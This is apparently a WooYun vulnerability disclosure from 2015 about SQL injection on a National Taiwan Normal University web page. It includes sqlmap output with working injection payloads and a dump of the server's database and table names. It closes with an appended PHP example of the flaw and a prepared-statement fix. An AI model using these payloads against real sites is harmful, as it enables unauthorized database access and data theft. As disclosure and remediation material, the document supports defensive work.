
Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-0163006

Title: SQL injection on a site of National Taiwan Normal University (Taiwan region)

Affected vendor: 國立臺灣師範大學 (National Taiwan Normal University)

Reporter: 路人甲

Submitted: 2015-12-21 12:44

Fixed: 2016-02-04 17:47

Published: 2016-02-04 17:47

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organization (Hitcon, Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]


Vulnerability Details

Disclosure status:

2015-12-21: details sent to the vendor, awaiting vendor handling
2015-12-23: vendor confirmed; details disclosed to the vendor only
2016-01-02: details disclosed to core white hats and experts in related fields
2016-01-12: details disclosed to regular white hats
2016-01-22: details disclosed to trainee white hats
2016-02-04: details disclosed to the public

Brief description:

As in the title.

Detailed description:

Injection point: http://**.**.**.**/wlsh/glink/show.php?ID=5

[20:11:38] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://**.**.**.**/spc/'. Do you want to follow? [Y/n] y
sqlmap got a refresh request (redirect like response common to login pages). Do you want to apply the refresh from now on (or stay on the original page)? [Y/n] y
[20:12:10] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=5 AND 7805=7805
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ID=5 AND (SELECT * FROM (SELECT(SLEEP(5)))ctFN)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: ID=-6285 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a707871,0x44557842636d72516d4a5167586e626d4f4173594958445352695a4350666e5176726a4e64497748,0x7170786a71),NULL-- -
---
[20:12:12] [INFO] testing MySQL
[20:12:12] [INFO] confirming MySQL
[20:12:12] [INFO] the back-end DBMS is MySQL

Proof of vulnerability:

available databases [15]:
[*] chsh_school
[*] cyshDB
[*] dyna
[*] giftedDB
[*] information_schema
[*] joomDB
[*] myDB
[*] mysql
[*] pfnDB
[*] sciDB
[*] scienceDB
[*] test
[*] voteDB
[*] webHD
[*] wlshDB


Database: scienceDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| baseTB | 268 |
| personalTB | 241 |
| fillTB | 239 |
| qNaireTB | 238 |
| linkTB | 108 |
| itemTB | 72 |
| gbook | 8 |
+---------------------------------------+---------+
Database: giftedDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| baseTB | 643 |
| personalTB | 643 |
| fillTB | 642 |
| qNaireTB | 642 |
| qnTest | 642 |
| linkTB | 100 |
| itemTB | 73 |
| teacherTB | 20 |
| gbook | 9 |
+---------------------------------------+---------+
Database: pfnDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| pfn_arquivos | 4 |
| pfn_arquivos_campos_palabras | 3 |
| pfn_configuracions | 3 |
| pfn_palabras | 3 |
| pfn_campos | 2 |
| pfn_accesos | 1 |
| pfn_bloqueo_ip | 1 |
| pfn_directorios | 1 |
| pfn_grupos | 1 |
| pfn_raices | 1 |
| pfn_raices_grupos_configuracions | 1 |
| pfn_raices_usuarios | 1 |
| pfn_sesions | 1 |
| pfn_usuarios | 1 |
+---------------------------------------+---------+
Database: chsh_school
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| memberTB | 311 |
| groups | 48 |
| courseTB | 13 |
+---------------------------------------+---------+
Database: joomDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| jos_content | 45 |
| jos_modules | 40 |
| jos_components | 32 |
| jos_modules_menu | 32 |
| jos_plugins | 32 |
| jos_menu | 30 |
| jos_categories | 22 |
| jos_poll_data | 12 |
| jos_core_acl_aro_groups | 11 |
| jos_poll_date | 11 |
| jos_banner | 8 |
| jos_newsfeeds | 8 |
| jos_session | 8 |
| jos_menu_types | 7 |
| jos_weblinks | 6 |
| jos_groups | 3 |
| jos_sections | 3 |
| jos_core_acl_aro | 2 |
| jos_core_acl_groups_aro_map | 2 |
| jos_templates_menu | 2 |
| jos_users | 2 |
| jos_bannerclient | 1 |
| jos_contact_details | 1 |
| jos_content_frontpage | 1 |
| jos_core_acl_aro_sections | 1 |
| jos_polls | 1 |
+---------------------------------------+---------+
Database: webHD
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| webhd_user | 2 |
| webhd_file | 1 |
+---------------------------------------+---------+
Database: cyshDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| baseTB | 384 |
| fillTB | 384 |
| qNaireTB | 384 |
| qnTest | 384 |
| personalTB | 383 |
| linkTB | 100 |
| itemTB | 73 |
| gbook | 5 |
+---------------------------------------+---------+
Database: sciDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| baseTB | 643 |
| personalTB | 643 |
| fillTB | 642 |
| qNaireTB | 642 |
| qnTest | 642 |
| linkTB | 100 |
| itemTB | 73 |
| teacherTB | 20 |
| gbook | 9 |
+---------------------------------------+---------+
Database: dyna
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| dyna_msg | 5817 |
| dyna_album | 1610 |
| dyna_schedule | 883 |
| dyna_web_area | 572 |
| dyna_menu | 556 |
| dyna_media | 342 |
| dyna_files | 207 |
| dyna_template | 166 |
| dyna_news | 93 |
| dyna_pub | 79 |
| dyna_video | 74 |
| dyna_netlink | 55 |
| dyna_member | 53 |
| dyna_user | 53 |
| dyna_modfiles | 52 |
| dyna_imglink | 51 |
| dyna_modvideo | 51 |
| dyna_web | 50 |
| dyna_modnews | 47 |
| dyna_modpub | 45 |
| dyna_modmsg | 43 |
| dyna_counter | 42 |
| dyna_modalbum | 42 |
| dyna_moddiscuss | 42 |
| dyna_modmenu | 42 |
| dyna_modnetlink | 42 |
| dyna_modschedule | 42 |
| dyna_modvote | 42 |
| dyna_discuss_forums | 21 |
| dyna_item | 15 |
| dyna_discuss_topics | 10 |
| dyna_guest | 4 |
| dyna_vote | 2 |
| dyna_post_check | 1 |
| dyna_setup | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 809 |
| help_topic | 466 |
| help_keyword | 395 |
| help_category | 36 |
| `user` | 3 |
| db | 2 |
+---------------------------------------+---------+
Database: wlshDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| baseTB | 311 |
| fillTB | 310 |
| personalTB | 310 |
| qNaireTB | 310 |
| qnTest | 310 |
| linkTB | 100 |
| itemTB | 73 |
| gbook | 4 |
+---------------------------------------+---------+
Database: voteDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| poll_templates | 39 |
| poll_data | 20 |
| poll_templateset | 5 |
| poll_index | 3 |
| poll_comment | 1 |
| poll_config | 1 |
| poll_log | 1 |
| poll_user | 1 |
+---------------------------------------+---------+
Database: myDB
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| macTB | 22 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 3313 |
| STATISTICS | 307 |
| KEY_COLUMN_USAGE | 214 |
| TABLES | 185 |
| TABLE_CONSTRAINTS | 176 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| USER_PRIVILEGES | 75 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 28 |
| SCHEMATA | 15 |
+---------------------------------------+---------+


I did not go any deeper; please take this seriously.

Remediation:

Filter the input.

Copyright notice: when reposting, credit the source as 路人甲@乌云

Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-12-23 04:22

Vendor reply:

Thank you for the report.

Latest status:

None yet
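As an added example (not code from the affected site or from this report), a hypothetical reconstruction of a show.php handler whose ID parameter is concatenated into the query, placed beside a hardened version that validates the parameter as an integer and binds it through a mysqli prepared statement. The table name linkTB is taken from the dump above; the column names and the connection placeholders are assumptions.

```php
<?php
// Added, hypothetical example: not the affected site's code.
// Column names (id, title, url) and connection values are assumptions.

// VULNERABLE (hypothetical reconstruction): the raw GET value is pasted into
// the SQL text, which is exactly the condition sqlmap detected above
// (boolean-based, time-based and UNION payloads all ride on this parameter).
function showLinkVulnerable(mysqli $db, array $get): ?array
{
    $sql = "SELECT id, title, url FROM linkTB WHERE id = " . $get['ID'];
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// HARDENED: "filtering" by itself is fragile; the robust fix is to validate
// the expected type and then bind the value, so the driver never treats it
// as SQL regardless of what characters it contains.
function showLinkSafe(mysqli $db, array $get): ?array
{
    // show.php only ever needs a positive integer; reject anything else
    // before the database is touched.
    $id = filter_var($get['ID'] ?? '', FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare("SELECT id, title, url FROM linkTB WHERE id = ?");
    $stmt->bind_param('i', $id);   // 'i' = bound as an integer parameter
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage (placeholders; an account limited to wlshDB is assumed):
// $db  = new mysqli('DB_HOST', 'DB_USER', 'DB_PASSWORD', 'wlshDB');
// $row = showLinkSafe($db, $_GET);
```

The database listing above also shows that the application's account could enumerate every schema on the server, including mysql, so restricting that account to wlshDB alone limits what any future injection could reach.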